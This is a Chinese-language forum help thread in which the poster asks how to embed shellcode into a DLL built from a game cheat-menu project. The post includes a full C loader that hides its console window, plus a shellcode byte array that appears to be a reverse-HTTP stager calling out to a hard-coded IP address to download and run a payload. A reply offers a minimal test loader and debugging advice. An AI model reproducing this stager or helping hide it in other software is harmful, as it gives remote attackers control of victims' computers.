【求助】shellcode怎么写到一个dll链接库文件
我想将一段shellcode写进一个用C编写的一个项目,shellcode可以单独编译并运行,可我一旦写到那个dll的项目,就运行不起来了这是那个dll的项目:https://github.com/BitCrackers/AmongUsMenu.git
这是我的shellcode:
------------------------------------------------------------------------
#include <stdio.h>
#include <windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")// 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")
//#include<stdio.h>
//#include<windows.h>
//#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52"
"\x0c\x8b\x52\x14\x89\xe5\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x50\x01\xd3\x8b\x48\x18"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xc9\x0f\x00\x00\xe8\x77\x01\x00\x00\x2f\x70\x69\x63\x69"
"\x71\x5f\x52\x35\x48\x66\x78\x56\x2d\x31\x54\x36\x4e\x57\x70"
"\x46\x62\x77\x67\x49\x78\x54\x6a\x48\x53\x54\x57\x6e\x31\x62"
"\x6e\x42\x68\x76\x63\x36\x6e\x5a\x6f\x59\x4d\x69\x44\x61\x5f"
"\x67\x49\x4b\x68\x65\x45\x4b\x77\x6a\x38\x68\x62\x6c\x41\x6d"
"\x5f\x63\x71\x4f\x35\x6d\x30\x57\x44\x4a\x5a\x4f\x75\x46\x42"
"\x74\x69\x44\x39\x73\x48\x61\x59\x31\x35\x4e\x34\x51\x4f\x75"
"\x35\x4b\x6e\x6b\x4c\x35\x54\x56\x50\x63\x53\x6e\x37\x4b\x6a"
"\x64\x70\x79\x73\x67\x2d\x2d\x4a\x6a\x59\x41\x78\x58\x6a\x69"
"\x4c\x69\x4c\x5a\x54\x6d\x6b\x50\x4b\x6f\x6d\x79\x7a\x74\x63"
"\x6f\x76\x45\x63\x54\x78\x5a\x55\x6d\x6a\x68\x7a\x4e\x55\x6b"
"\x33\x6c\x47\x43\x6e\x4c\x34\x2d\x47\x7a\x6f\x64\x45\x66\x6b"
"\x30\x46\x2d\x30\x77\x54\x6e\x56\x56\x36\x47\x42\x62\x53\x54"
"\x56\x54\x7a\x31\x32\x41\x59\x52\x48\x46\x76\x54\x6d\x33\x68"
"\x75\x74\x72\x62\x6d\x6d\x65\x33\x77\x69\x6c\x39\x35\x57\x38"
"\x49\x67\x52\x37\x2d\x62\x50\x4a\x45\x75\x54\x79\x77\x63\x46"
"\x5a\x41\x67\x36\x73\x31\x78\x41\x53\x50\x59\x57\x61\x72\x57"
"\x5f\x71\x64\x54\x78\x69\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5"
"\x89\xc6\x53\x68\x00\x02\x68\x84\x53\x53\x53\x57\x53\x56\x68"
"\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56"
"\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00"
"\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4a\x00\x00"
"\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68"
"\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20"
"\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf"
"\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff"
"\xff\x31\x30\x33\x2e\x34\x35\x2e\x31\x36\x31\x2e\x32\x37\x00"
"\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main(int argc, char **argv)
{
__asm
{
lea eax, shellcode
call eax
}
return 0;
}
------------------------------------------------------------------------ #include <stdio.h>
#include <windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")// 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\x90\x90\x90\xC3";
/*
nop 3次;返回
*/
int main(int argc, char **argv)
{
__asm
{
lea eax, shellcode
call eax
}
return 0;
}
cpp最简的代码没有问题,估计是你的shellcode出问题了。
上面一堆shellcode hex不好调试,先检查一下栈平衡
页:
[1]